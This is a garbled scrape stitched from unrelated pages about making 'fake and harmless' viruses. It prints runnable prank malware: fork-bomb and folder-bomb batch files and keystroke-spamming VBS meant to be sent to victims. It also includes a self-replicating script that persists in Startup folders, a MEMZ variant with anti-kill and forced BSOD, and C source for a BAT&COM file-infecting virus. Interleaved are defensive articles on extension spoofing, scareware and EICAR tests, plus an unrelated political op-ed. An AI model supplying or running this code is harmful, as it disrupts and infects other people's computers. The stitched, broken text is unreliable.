    click below button to copy the code. By Ethical hacking tutorial team

    Instruction:

    • Save the file as virus.vbs The file should be saved in the vbs format.

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – virus – ethical-hacking examples – ethical-hacking programs

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – harmless-virus – ethical-hacking examples – ethical-hacking programs

    • On clicking “OK” button the message box will go off.

    Virus 2:

    • If we are looking for continuous message boxes. Change the code to loop into it. So that, we will get continuous message boxes.
    click below button to copy the code. By Ethical hacking tutorial team

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – notepad-virus – ethical-hacking examples – ethical-hacking programs

    • On clicking the message box “OK” button. We will get continuos message boxes.

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – harmless-virus – ethical-hacking examples – ethical-hacking programs

    How to remove virus :

    • Goto task bar and right click and select “Task Manager”

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – virus-toolbar – ethical-hacking examples – ethical-hacking programs

    • Your task manager will open
      • Search for “Microsoft Windows Based Script Host” in Windows10
      • Search for “wscript.exe” in Windows 7.

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – virus-end-task – ethical-hacking examples – ethical-hacking programs

    • Select the process, right click and click “End Task”. Your process is killed and your virus is killed

    Virus 3:

    • Let’s see another Simple Virus To Crush The Window
    click below button to copy the code. By Ethical hacking tutorial team
    • Save It As Anything.bat

    How to create a fake and harmless virus

    Learn ethical-hacking – ethical-hacking tutorial – batch-file – ethical-hacking examples – ethical-hacking programs

    • On clicking the bat file, automatically your windows will get closed.

    Related Searches to vbs virus

    World’s No 1 Animated self learning Website with Informative tutorials explaining the code and the choices behind it all.

    Wikitechy

    Workshop

    Join our Community

    Other Languages

    We’ve detected that you are using AdBlock Plus or some other adblocking software which is preventing the page from fully loading.

    We don’t have any banner, Flash, animation, obnoxious sound, or popup ad. We do not implement these annoying types of ads!

    We need money to operate the site, and almost all of it comes from our online advertising.

    A safe reinterpretation of https://github.com/Leurak/MEMZ Memez does not corrupt your mbr, delete files, or cause any harmful side-effects. Works on windows.

    You can build with msvs as usual. Compilation by hand is also possible; c++ -o memez memez.cpp .

    1. edit the install.ps1 and add the target username to the $username variable
    2. run install.ps1 from the root folder of the project. To verify that it was installed run Get-ScheduledTask and look for the memez*. Get-ScheduledTask also takes a -Name flag.
    • DONE Prevent users from killing memez. Just install script as admin
    • DONE Create a windows service that runs memez at a certain time/day. The install.ps1 does that
    • DONE BSOD after memez has finished. Oh boy does it.

    About

    A Harmless Windows Virus

    Resources

    Stars

    Watchers

    Forks

    Releases 3

    Packages 0

    Contributors 2

    Languages

    © 2022 GitHub, Inc.

    • Terms
    • Privacy
    • Security
    • Status
    • Docs
    • Contact GitHub
    • Pricing
    • API
    • Training
    • Blog
    • About

    You can’t perform that action at this time.

    You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.

    Chris Hoffman is Editor-in-Chief of How-To Geek. He’s written about technology for over a decade and was a PCWorld columnist for two years. Chris has written for The New York Times and Reader’s Digest, been interviewed as a technology expert on TV stations like Miami’s NBC 6, and had his work covered by news outlets like the BBC. Since 2011, Chris has written over 2,000 articles that have been read nearly one billion times—and that’s just here at How-To Geek. Read more.

    How to create a fake and harmless virus

    File extensions can be faked – that file with an .mp3 extension may actually be an executable program. Hackers can fake file extensions by abusing a special Unicode character, forcing text to be displayed in reverse order.

    Windows also hides file extensions by default, which is another way novice users can be deceived – a file with a name like picture.jpg.exe will appear as a harmless JPEG image file.

    Disguising File Extensions With The “Unitrix” Exploit

    If you always tell Windows to show file extensions (see below) and pay attention to them, you may think that you’re safe from file-extension-related shenanigans. However, there are other ways people can disguise the file extension.

    Dubbed the “Unitrix” exploit by Avast after it was used by the Unitrix malware, this method takes advantage of a special character in Unicode to reverse the order of characters in a file name, hiding the dangerous file extension in the middle of the file name and placing a harmless-looking fake file extension near the end of the file name.

    The Unicode character is U+202E: Right-to-Left Override, and it forces programs to display text in reverse order. While it’s obviously useful for some purposes, it probably shouldn’t be supported in file names.

    How to create a fake and harmless virus

    Essentially, the file’s actual name can be something like “Awesome Song uploaded by [U+202e]3pm.SCR”. The special character forces Windows to display the end of the file’s name in reverse, so the file’s name will appear as “Awesome Song uploaded by RCS.mp3”. However, it’s not an MP3 file – it’s an SCR file and it will be executed if you double-click it. (See below for more types of dangerous file extensions.)

    How to create a fake and harmless virus

    This example is taken from a cracking site, as I thought it was particularly deceptive – keep an eye on the files you download!

    Windows Hides File Extensions By Default

    Most users have been trained not to launch untrusted .exe files download from the Internet as they may be malicious. Most users also know that some types of files are safe – for example, if you have a JPEG image named image.jpg, you can double-click it and it will open in your image-viewing program without any risk of getting infected.

    There’s just one problem – Windows hides file extensions by default. The image.jpg file may actually be image.jpg.exe, and when you double-click it you’ll launch the malicious .exe file. This is one of the situations where User Account Control can help – malware can still do damage without administrator permissions, but won’t be able to compromise your entire system.

    Worse yet, malicious individuals can set any icon they want for the .exe file. A file named image.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. While Windows will tell you that this file is an application if you look closely, many users won’t notice this.

    How to create a fake and harmless virus

    Viewing File Extensions

    To help protect against this, you can enable file extensions in Windows Explorer’s Folder Settings window. Click the Organize button in Windows Explorer and select Folder and search options to open it.

    How to create a fake and harmless virus

    Uncheck the Hide extensions for known file types checkbox on the View tab and click OK.

    How to create a fake and harmless virus

    All files extensions will now be visible, so you’ll see the hidden .exe file extension.

    How to create a fake and harmless virus

    .exe Isn’t the Only Dangerous File Extension

    The .exe file extension isn’t the only dangerous file extension to look out for. Files ending with these file extensions can also run code on your system, making them dangerous, too:

    This list isn’t exhaustive. For example, if you have Oracle’s Java installed, the .jar file extension can also be dangerous, as it will launch Java programs.

    This page doesn’t provide information on how to create a computer virus. Computer Hope doesn’t condone the creation of or use of computer viruses, and therefore doesn’t provide training on how to create a virus. This page discusses the reasons for not creating viruses and alternate options that you could pursue.

    How to create a fake and harmless virus

    If you are interested in creating a computer virus, trojan, worm, malware, or another malicious program as revenge, payback, or as a prank, we suggest you rethink. Creating a virus that deletes files or causes other issues resolves nothing and results in prosecution by the law. In other words, you could be fined or sent to prison.

    Instead of creating computer viruses or other malware, consider learning a computer programming language. You will learn a lot more by learning one or more programming languages and become more qualified in getting hired at a company that designs programs or analyzes viruses. No one ever got hired because they wrote a computer virus.

    I only want to write a virus to learn how they work

    How to create a fake and harmless virus

    You will learn a lot more about how computer programs and viruses work by learning to program than you ever will by writing and tinkering with computer viruses. A computer virus is a program solely designed to do malicious tasks, such as deleting files or inserting code into other files to corrupt them. It accomplishes these tasks by copying itself to other areas in memory or by spreading to other computers and areas the logged in user can access. By learning to program, you’ll understand how viruses work in addition to gaining other skills.

    What programming languages should I learn?

    Programming languages such as C, C++, C#, Java, Perl, PHP, and Python are all good programming languages for new computer programmers. See the link below if you are not exactly sure what language to start learning first.

    I need to test my virus scanner

    You can create test virus files to test your computer’s antivirus scanner without having to create one. See the link below for additional information and code on how to create a test virus.

    If I create a good computer virus, I will be famous

    No, the only fame you may get is a brief news article or a picture of you being handcuffed and sent to prison. Once incarcerated, it’s on your record and would make it impossible to get hired at any respectable computer company or government agency.

    If you were to write a computer virus that was successful, you would want to remain anonymous in fear of being prosecuted by the law. Also, if you think about it, almost everyone knows Bill Gates and what he has done for computers but has never heard of Jeffrey Parson.

    If I write a good virus, a security firm or antivirus company will hire me

    How to create a fake and harmless virus

    False, no respectable security firm or antivirus company wants to be affiliated with a virus or malware creator that infected potential customer computers. If you are interested in getting a job with a security firm or antivirus company, you have a better chance by learning to program. Doing things like becoming a participant in security discussions, being a beta tester, or finding and reporting program vulnerabilities are recommended. Companies, such as Google, even pay good money to anyone who reports bugs or security vulnerabilities about any of their products.

    I need details, examples, or other information about creating viruses

    Computer Hope will not send any other information about creating computer viruses, worms, or trojans. This page was created to help deter people from creating computer viruses and learn computer programming instead.

    Well we continue with our harmless viruses. The third and almost the last fake virus you will learn to create is starting as usuall , with the opening of our well known notepad !

    Type the following:

    lol=msgbox (“Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot”,20,”Warning”)
    All that in one line.Σε αντίθεση με τους άλλους ιούς που τους κάναμε save as virus.vbs, αυτόν τον τον κάνουμε save as virus.vbs

    What does it do?
    it appears a (false) message which says that there is a virus on your pc

    fake virus 2

    The second and completely harmless virus starts as usuall with opening notepad.Make sure you have written the following article
    @echo off
    echo bye bye
    :whatever
    start %0
    goto whatever

    It opens a command line over and over .If you open it by mistake shutdown your computer quickly because if you let it opening over and over it will crash your computer

    Πέμπτη 1 Απριλίου 2010

    fake virus

    The first -but completely harmless- virus you can make easily is:

    1.) Δεξί κλικ στην επιφάνεια εργασίας.

    2.) Πατήστε δημιουργία

    3.) Μετά συντόμευση

    4.) Έπειτα πηκτρολογήστε στα αγγλικά:shutdown -s -t 60 -c “bye bye”

    5.) Ύστερα πατήστε επόμενο

    6.) Στο κουτί που εμφανίζεται πηκτρολογήστε όποιο όνομα θέλετε

    This virus doesn’t harm the computer just shuts it down

    Here you can find out information about your study with some extra study related knowledge.

    • Home
    • Study
      • COMPUTER AND SCIENCE
      • ELECTRONIS AND COMMUNICATION
      • ELECRICAL
      • CIVIL
      • MECHANICAL
      • MATHS
    • DOWNLOADS
      • PHOTOS
      • GAMES
      • SOFTWARES
    • READING GALLERY
      • BOOKS
        • STUDY BOOKS
        • TRAVELLING BOOKS
        • NOVELS
      • SHORT STORIES
      • ARTICALS
    • HACKING
    • FASHION
      • MAKE UP
      • SKIN
      • HAIR
      • STYLE
    • OTHERS
    • Disclaimer

    Pages

    • HOME
    • Disclaimer

    Saturday, 8 June 2013

    How can you make a fake virus?

    so friends would you like to freak out your friends??

    Step 1:

    Step 2 :

    Step 3:

    Step 4:

    Step 5:

    Step 6:

    NOTE: This will not work in Windows 7 Pro

    8 comments :

    what about windows 8 .
    😛

    am not using windows so i cant try it but you can try in windows 8.
    btw are you really using windows 8?? 😛 😀

    wht u wanna say exactly??

    do you want to write a blog on my website.
    m asking that

    btw who r u?? n which website??

    will tell you name n website in gmail or fb..
    share your email or profile link over here

    Strange “water hack” burns 2lbs overnight

    More than 160 thousand women and men are trying a simple and SECRET “liquid hack” to lose 2lbs each night in their sleep.

    It is painless and it works on everybody.

    This is how you can do it yourself:

    1) Hold a clear glass and fill it half full

    • March 2016
    • February 2016
    • October 2015
    • September 2015
    • August 2015
    • BANGLADESH
    • BIG BOSS
    • cricket
    • funny
    • INDIA
    • INDIAN ARMY
    • Indian Festival
    • JANAMASTHAMI
    • RAKHI
    • tech
    • Uncategorized
    • Widgets
    • Search

    Who doesn’t want to have some fun? And if you are doing with your friends then its can’t be more funnier.

    So here we have listed some of the most cool Computer pranks to do with your friends and to freak them out like hell.
    This prank viruses are harmless to the computer system so don’t worry and enjoy.

    (1) Fake Virus Batch File.

    I got this prank from WikiHow.
    I love it because it looks the most like an actual attack.
    Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”

    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep
    echo Wscript.Sleep
    5000>C:sleep5000.vbs
    echo Wscript.Sleep
    3000>C:sleep3000.vbs
    echo Wscript.Sleep
    4000>C:sleep4000.vbs
    echo Wscript.Sleep
    2000>C:sleep2000.vbs
    cd %systemroot%System32
    dir
    cls
    start /w wscript.exe C:sleep3000.vbs
    echo Deleting Critical System Files…
    echo del *.*
    start /w wscript.exe C:sleep3000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo:
    echo Deleting Root Partition…
    start /w wscript.exe C:sleep2000.vbs
    echo del %SYSTEMROOT%
    start /w wscript.exe C:sleep4000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo:
    echoCreating Directory h4x…
    cd C:Documents and SettingsAll
    UsersStart MenuPrograms
    mkdir h4x
    start /w wscript.exe C:sleep3000.vbs
    echo Directory Creation Successful!
    echo:
    echo:
    echo:
    echo Execution Attempt 1…
    start /w wscript.exe C:sleep3000.vbs
    echo cd C:Documents and SettingsAll
    UsersStart MenuProgramsStartuph4x
    echo start hax.exe
    start /w wscript.exe C:sleep3000.vbs
    echo Virus Executed!
    echo:
    echo:
    echo:
    start /w wscript.exe C:sleep2000.vbs
    echo Disabling Windows Firewall…
    start /w wscript.exe C:sleep2000.vbs
    echo Killing all processes…
    start /w wscript.exe C:sleep2000.vbs
    echo Allowing virus to boot from
    startup…
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo Virus has been executed
    successfully!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo Have fun!
    start /w wscript.exe C:sleep2000.vbs
    pause
    shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”

    Here’s hiw it will look after launching:

    Your victim’s PC will display
    messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a”� in the Run command box. It looks bad, but is otherwise completely harmless.

    (2) Hack your friend’s keyboard and make him type “You are a fool”.

    Set wshShell = wscript.CreateObject(“WScript.Shell”dowscript.sleep 100wshshell.sendkeys “You are a fool.”
    loop

    Save it as “Anything.VBS” and send it.

    (3) Open Notepad continually in your friend’s computer.

    Type :@ECHO off:topSTART%SystemRoot%\system32\notepad.exe
    GOTO top

    Save it as “Anything.BAT” and send it.

    (4) Continually Eject the CD-ROM:

    This trick will make your computer to continually eject the CD-ROM. Just paste this code in Notepad:

    Set oWMP = CreateObject(“WMPlayer.OCX.7″wink
    Set colCDROMs= oWMP.cdromCollection do if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

    Save the file ascdrom.vbsor with other name as.vbsextension. Now open the file and see the trick.

    Don’t forget to share these tricks with your friends. If you know more tricks then share them in the comment box. Thanks!

    Fb page:
    fb/ShaktimanVsSupermanJokes

    This WordPress.com site is the bee’s knees

    How to create a fake and harmless virus

    Set wshShell =wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “

    loop

    A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

    Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it’ll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include “disinf” for erasing all of the copies permanently.

    @ECHO OFF
    :This was meant as a harmless joke, and it’s not hard to fix if you read through the code.
    :If you just use the “disinf” argument on the command line all is well. lease only use this on people u don’t like
    IF “%1″==”” GOTO fill
    IF “%1″==”fill” GOTO fill
    IF “%1″==”kill” GOTO kill
    IF “%1″==”inf” GOTO inf
    IF “%1″==”disinf” GOTO kill
    GOTO bye
    :fill
    IF EXIST C:\Users\%USERNAME%\Desktop\ (
    FOR /L %%A IN (1, 1, 200) DO TYPE “%

    df0” > “C:\Users\Public\Desktop\joke%%A.bat”
    FOR /L %%A IN (1, 1, 200) DO TYPE “%

    df0” > “C:\Users\%USERNAME%\Desktop\joke%%A.bat”
    )
    FOR /L %%A IN (1, 1, 200) DO TYPE “%

    df0” > “C:\Documents and Settings\All Users\Desktop\joke%%A.bat”
    FOR /L %%A IN (1, 1, 200) DO TYPE “%

    df0” > “C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat”
    IF “%1″==”” GOTO inf
    GOTO theend
    :kill
    IF EXIST C:\Users\%USERNAME%\Desktop\ (
    FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL “C:\Users\Public\Desktop\joke%%A.bat”
    FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL “C:\Users\%USERNAME%\Desktop\joke%%A.bat”
    )
    FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL “C:\Documents and Settings\All Users\Desktop\joke%%A.bat”
    FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL “C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat”
    IF “%1″==”disinf” GOTO disinf
    GOTO theend
    :inf
    TYPE “%

    df0” > “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat”
    TYPE “%

    df0” > “C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat”
    TYPE “%

    df0” > “C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat”
    GOTO theend
    :disinf
    ECHO Y | DEL “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat”
    ECHO Y | DEL “C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat”
    ECHO Y | DEL “C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat”
    GOTO theend
    :bye
    ECHO “fill” to make more and “kill” to get rid of ’em. inf to make it stick a little longer
    :theend

    Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it’ll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include “disinf” for erasing all of the copies permanently.\

    Copy and paste the below into notepad and save it as hi.bat (Not .txt)
    run it, and enjoy anarchy.

    Code:

    @echo off
    :START
    echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
    start hi.bat
    GOTO START

    How to create a fake and harmless virus

    1. Just open up a notepad, copy and paste the below code

    cd\
    cd C:\Documents and Settings\username\Desktop
    :loop
    md Virus
    cd Virus
    goto loop

    2. Save it as a batch file with the extension .bat.
    3. Then run it on the Victims computer to infect it.
    4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

    VIRUS CODES IN “ C “ :-

    How to create a fake and harmless virus

    BATCH & COM VIRUS

    #include
    #include
    #include
    #include

    struct ffblk ffblk;
    main()
    <
    char old_dir[MAXPATH];
    Get_Path(old_dir); /* Save the old directory */
    Pick_A_Dir(); /* Find a new directory to */
    Infect_Directory(); /* infect and infect it. */
    chdir(old_dir); /* Return to old directory */
    return 0;
    >

    Pick_A_Dir()
    <
    int done;
    chdir(“..”); /* First, Go out a DIR. */
    done=findfirst(“*.BAT”,&ffblk,0); /* If no BAT files, try */
    /* root and DOS */
    if (done)
    <
    chdir(“\\”);
    done=findfirst(“*.BAT”,&ffblk,0);
    if (done) chdir(“\\DOS\\”);
    >
    return 0;
    >
    Infect_Directory()
    <
    int done;
    done = findfirst(“*.BAT”,&ffblk,0);
    while (!done) /* Find all .BAT files */
    < /* and add code to run */
    Do_Batch(); /* BAT&COM if not */
    done = findnext(&ffblk); /* already there */
    >

    if (findfirst(“BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does */
    /* not exist, then */
    return 0; /* copy it into dir.*/
    >
    Do_Batch()
    <
    FILE *batch;
    char Infection_Buffer[12];
    char vpath[MAXPATH];
    Get_Path(vpath); /* Get path for adding path */
    /* specifier in commands */
    if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */
    batch=fopen(ffblk.ff_name, “rt+”);
    fseek(batch, -11, SEEK_END);
    fread(Infection_Buffer,11,1,batch);
    Infection_Buffer[11]=0; /* Terminate String */
    if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */
    < /* Batch is */
    fseek(batch, 0, SEEK_END); /* infected.*/
    fprintf(batch,”\n%s\\BAT&COM.COM”,vpath);
    > /*^- Add command */
    /* to batch */
    fclose(batch);
    return 0;
    >
    Copy_Virus()
    <
    FILE *old_virus, *new_virus;
    int write_length;
    char copy_buffer[1024]; /* Copy the virus to */
    /* new directory */
    old_virus=fopen(_argv[0],”rb”);
    new_virus=fopen(“BAT&COM.COM”,”wb”);
    write_length=1024;
    while (write_length==1024)
    <
    write_length=fread(copy_buffer,1,1024,old_virus);
    fwrite(copy_buffer,write_length,1,new_virus);
    >
    fclose(old_virus);
    fclose(new_virus);
    return 0;
    >
    Get_Path(char *path)
    <
    strcpy(path, “A:\\”);
    path[0] =’A’ + getdisk(); /* Returns current path */
    getcurdir(0, path+3);
    return 0;
    >

    – – – —————–End of Code———————— – – –

    BLACK WOLF VIRUS

    /* It will infect all .COM files in the current directory */

    Business Know-How

    • Share on Facebook
    • Share on LinkedIn
    • Share on Twitter
    • Share by Email

    Pop up messages claiming that you have a virus and you are in need of anti-virus software may, ironically, actually contain a virus that could harm your computer, cause costly repairs or, even worse, lead to identity theft. Here’s what you need to know to protect yourself and your business from scareware.

    I have a friend in the real estate business in California who told me that he wanted to pick up his computer and hurl it through a window.

    The cause of his frustration was an incessant series of pop up messages on his computer screen that warned he had a virus on his computer. He could not figure out how to make the pop ups go away and eventually his computer ceased working.

    He presumed that the warnings were legitimate, but he later learned that he was the victim of a type of cybercrime called “scareware.”

    Pop up messages claiming that you have a virus and you are in need of anti-virus software may, ironically, actually contain a virus that could harm your computer, cause costly repairs or, even worse, lead to identity theft.

    RELATED: How to Create Strong Passwords

    Scareware is sold to unsuspecting computer users who fear viruses on their computers. The scareware is either useless or contains damaging malware programs. The cyber criminals convince users that he or she has a virus that has infected their computer and then offers anti-virus software to remove it. The virus does not in fact exist until the user downloads the scareware.

    The term scareware describes software products that often generates a bombardment of pop up warning messages that makes using your computer difficult.

    The message may display what appears to be a real-time, anti-virus scan of your hard drive. The scareware will show a list of reputable software icons; however, you can’t click a link to go to the real site to review or see recommendations.

    Once the pop-up warning appears, it can’t easily be deleted by clicking on the “close” or “X” buttons. In some cases, the popup instructs you to click a link to purchase the software, or just has an “OK” button or some other button or link to click. Don’t be tempted. You do not want to click anything in the popup. If you do, you may then see a form to collect payment information for the bogus viurs protection product. In some cases the scareware installs malicious code onto your computer, whether you click the warning or not.

    Downloading from one of these fake virus warning popups can result in viruses, malicious software called Trojans, and/or keyloggers— hardware that records passwords and sensitive data —being installed on your computer. This malicious software can cause severe damage and the inability to use your computer.

    In other cases, the popups direct you to call a phone number to get live help to uninstall the virus. Do not do so! When you call the number you may be asked to give your credit card information and/or give the person who answers your call remote access to your computer. With remote access they can install various types of malware.

    The Federal Trade Commission (FTC) warns that the scareware scam has many variations, but there are some telltale signs. For example:

    • You may get ads that promise to “delete viruses or spyware,” “protect privacy,” “improve computer function,” “remove harmful files,” or “clean your registry;”
    • you may get “alerts” about “malicious software” or “illegal pornography on your computer;”
    • you may be invited to download free software for a security scan or to improve your system;
    • you could get pop-ups that claim your security software is out-of-date and your computer is in immediate danger;
    • you may suddenly encounter an unfamiliar website that claims to have performed a security scan and prompts you to download new software.

    Scareware schemes can be quite sophisticated. The cyber criminals purchase ad space on trusted, popular websites. Although the ads look legitimate and harmless to the website’s operator, they actually redirect unsuspecting visitors to a fraudulent website that performs a bogus security scan. The site then causes a barrage of urgent pop-up messages that pressure users into downloading worthless software.

    The FTC suggests that if you’re faced with any of the warning signs of a scareware scam or suspect a problem, shut down your browser. Don’t click “No” or “Cancel,” or even the “x” at the top right corner of the screen. Some scareware is designed so that any of those buttons can activate the program. If you use Windows, press Ctrl + Alt + Delete to open your Task Manager, and click “End Task.” If you use a Mac, press Command + Option + Q + Esc to “Force Quit.”

    Lastly, make it a practice not to click on any links within pop-ups.

    The FBI recommends that you take precautions to ensure your operating systems are updated and your legitimate security software is current. If you receive these anti-virus pop-ups, close the browser or shut down your computer system. Run a full anti-virus scan whenever the computer is turned back on.

    Environment

    Endpoint Security (ENS) Threat Prevention 10.x
    VirusScan Enterprise (VSE) 8.8

    European Institute for Computer Anti-Virus Research (EICAR) antimalware test file

    Summary

    EICAR developed the EICAR antimalware test file. The EICAR test file is a legitimate DOS program that’s detected as malware by antivirus software. When the test file runs successfully (if it isn’t detected and blocked), it prints the message “EICAR-STANDARD-ANTIVIRUS-TEST-FILE!”

    There are two ways to obtain the standard EICAR test file:

    • Download the file directly from the EICAR website.
    • Use a text editor to create the file:
      1. Open a text editor such as Notepad.
      2. Copy the following string into the new file:

    NOTE: The third character is the capital letter ‘O,’ and not the digit zero.

  • Save the file as eicar.com .
  • There are multiple ways to use the EICAR test file to verify that your security software is working correctly.

    NOTE: If you use an EICAR test file, it’s important to note that although you can detect and block or quarantine the file, you can’t clean it. The reason is because the EICAR file doesn’t contain any ‘real’ viral code. The EICAR test file is designed to make most antivirus products react to it as if it were a real virus. But, any attempt to clean the EICAR file fails. This behavior is as expected.

    NOTE: This procedure varies, depending on your operating system and product. See the appropriate product guide for your software.

    X5O!P%@AP[4\PZX54(P^)7CC)7>$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

    Type a single full stop (.) on a line by itself and press Enter to send your message. You receive a response similar to one of the following examples:

    Message accepted for delivery

  • To exit Telnet, type QUIT and press Enter.
  • If the On-Delivery Email Scanner is functioning correctly, it’s detected as malware.

    to your local hard disk.
    Copy

    to each excluded folder that you want to test.

  • Start the McShield Service:
    1. Press Windows+R, type services.msc , and click OK.
    2. Right-click McAfee McShield and choose Start.
    3. Close the Services Window.
  • Run

    :

      Browse to each folder where

    is copied.
    Double-click

    in each excluded folder. If the exclusions are configured properly,

    runs without being detected. You can verify this result by also running the file in a non-excluded location to verify that the EICAR sample that you’re using is detected. VSE detects

    as a virus and prevents its execution.

  • Re-enable the Access Protection rule to prevent our services from being stopped:
    1. Click Start, Programs, McAfee, VirusScan Console.
    2. Right-click Access Protection and select Properties.
    3. Click the Access Protection tab.
    4. In the lower left corner, select Prevent McAfee services from being stopped.
    5. Click Apply and then OK.
    6. Close the VirusScan Console.
  • test file functions in the same way as the standard EICAR test string. But, antispyware detects it as a potentially unwanted program instead of a virus.

    test file:

    1. Open a text editor such as Notepad.
    2. Copy the following string into the new file:

    X5]+)D:)D

  • Select File, Save.
  • Type the file name and click Save.

    NOTES:

    • To make the file easily recognizable, Technical Support recommends that you save the file as EICAR-PUO.COM . The saved file size is about 68–70 bytes.
    • All features of the standard EICAR detection remain true for

    test file is identified under the test category in the same way as the standard EICAR test file.

    is an antispyware test file. So, you must enable potentially unwanted program detection to be successful.

    1. Enable AMSI integration in ENS.
    2. Start PowerShell and run the following command:

    powershell echo ‘”X5O!P%@AP[4\PZX54(P^)7CC)7>$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*”‘

    Verify that a detection is triggered for the threat:

    file. Add the content below in the file:

    NOTE: Modify the source path in the HTML. Reference the location where

    At his July 4 th rally at Mount Rushmore, South Dakota, President Donald Trump declared that 99 percent of all coronavirus cases “are totally harmless.” Well that was certainly reassuring.

    Know more about Russia than your friends:

    Get our free ebook on how the Soviet Union became Putin’s Russia.

    But before we rush out to celebrate that great news, let’s check the math. There have been some 2,852,000 cases in the United States, and about 130,000 people have died.

    How to create a fake and harmless virusLee Ainslie’s Maverick Capital had its second-worst quarter ever during the first three months of the year, losing 22.9%, compared to the S&P 500’s -4.6% return and the MS World’s -5.2% return. Maverick’s Levered strategy returned -37.4%, while its Long strategy was down 11.1%, and its Long Enhanced strategy lost 13.8%. Maverick’s annualized return is Read More

    President’s Math Was A Bit Off About Harmless Coronavirus Cases

    So, it looks as though the president’s math was just a bit off. It turns out that 4.6 percent of the people who contracted the virus have died. And if we were to add in the thousands who currently have the virus who will die over the next month or two, then perhaps just 95 percent of the coronavirus cases will prove to be “totally harmless.”

    Interestingly, not one person in his “yuge” audience, and not one member of his administration “of the best people”, corrected the president’s sunny numerical assessment. And even most of the “fake news” outlets let this error go uncorrected.

    Perhaps our stable genius president needs to take a remedial math refresher course at Trump University. Calculating percentages is one of the most important mathematical skills you should have learned in middle school.

    But even a 95 percent “totally harmless” figure is far too optimistic. Indeed, ask the nearly three million Americans who have survived the virus if they would describe it in those terms.

    The Rising Numbers Of New Cases

    Despite the president’s amazingly sunny predictions that the coronavirus “will just fade away,” during the last two weeks we have experienced a rapidly rising number of new cases almost every day. Dr. Anthony Fauci, our leading epidemiologist, has predicted that the average number of daily cases – currently about 50,000 — will likely double in the coming months.

    Our president is a notorious risk-taker. Indeed, the man has gone through four bankruptcies. So, let me propose one last risk he can take.

    First, expose himself to the coronavirus. If he becomes infected, then ask him the same question every day: Do you still think this virus is 99 percent totally harmless?

    Last updated on January 23rd, 2020 at 6:07 pm

    Messaging through WhatsApp is really easy, especially with the delivery reports (the two ticks), the read receipts and the speed of delivery, etc. It’s also a favorite with digital marketers, since it can be used for mass messaging. Given its ease, some hackers can send virus or malware through WhatsApp, sometimes even a Trojan horse. Read on to know how hackers can send a virus through WhatsApp?

    Different Ways Hackers Use WhatsApp to Send a Virus

    In this post, you can not only read about how hackers send virus through WhatsApp, but how you can prevent it as well. Following are the ways to hack WhatsApp followed by cybercriminals.

    Voice messages

    This trend began around the same time as 2016 – sending emails with the subject line ‘a new voice message’. These emails looked as if they were legitimate automated emails from WhatsApp. An example of one is below.

    How to create a fake and harmless virus

    You should stay wary of such emails since, even if you open one such email, your device can get infected. You should also not click any part of this message.

    How to create a fake and harmless virus

    Images

    Sending multi-media through a cell service is difficult and hence, images containing malware are sent through WhatsApp. The images seem pretty harmless, but the virus is embedded into normal code. What you can do is to avoid conversations with people you don’t know. Don’t download images that have been sent to you by random people.

    Videos

    In recent attempts to breach data security by sending virus through WhatsApp include malicious video content. Here, attackers may send you a malicious video link or attachment. Once you download this video content on your device, you will notice your data security is compromised.

    Updated version of WhatsApp

    This method has taken a rage – people sending links saying that there is an updated version of WhatsApp. It’s entirely possible to infect a message with a virus, even though the link in the message opens to Play Store or App Store.

    Never click on such messages. Set your phone to automatically update apps or to prompt you when there is such an update available. You can then avoid clicking on such messages.

    Fake Vouchers

    Around June last year, there was a sudden explosion of fake vouchers being circulated through WhatsApp. They were discovered to be fake, because when people tried to redeem the vouchers, the organizations, in whose name they were in, had no record of coupons or vouchers with the same barcode!

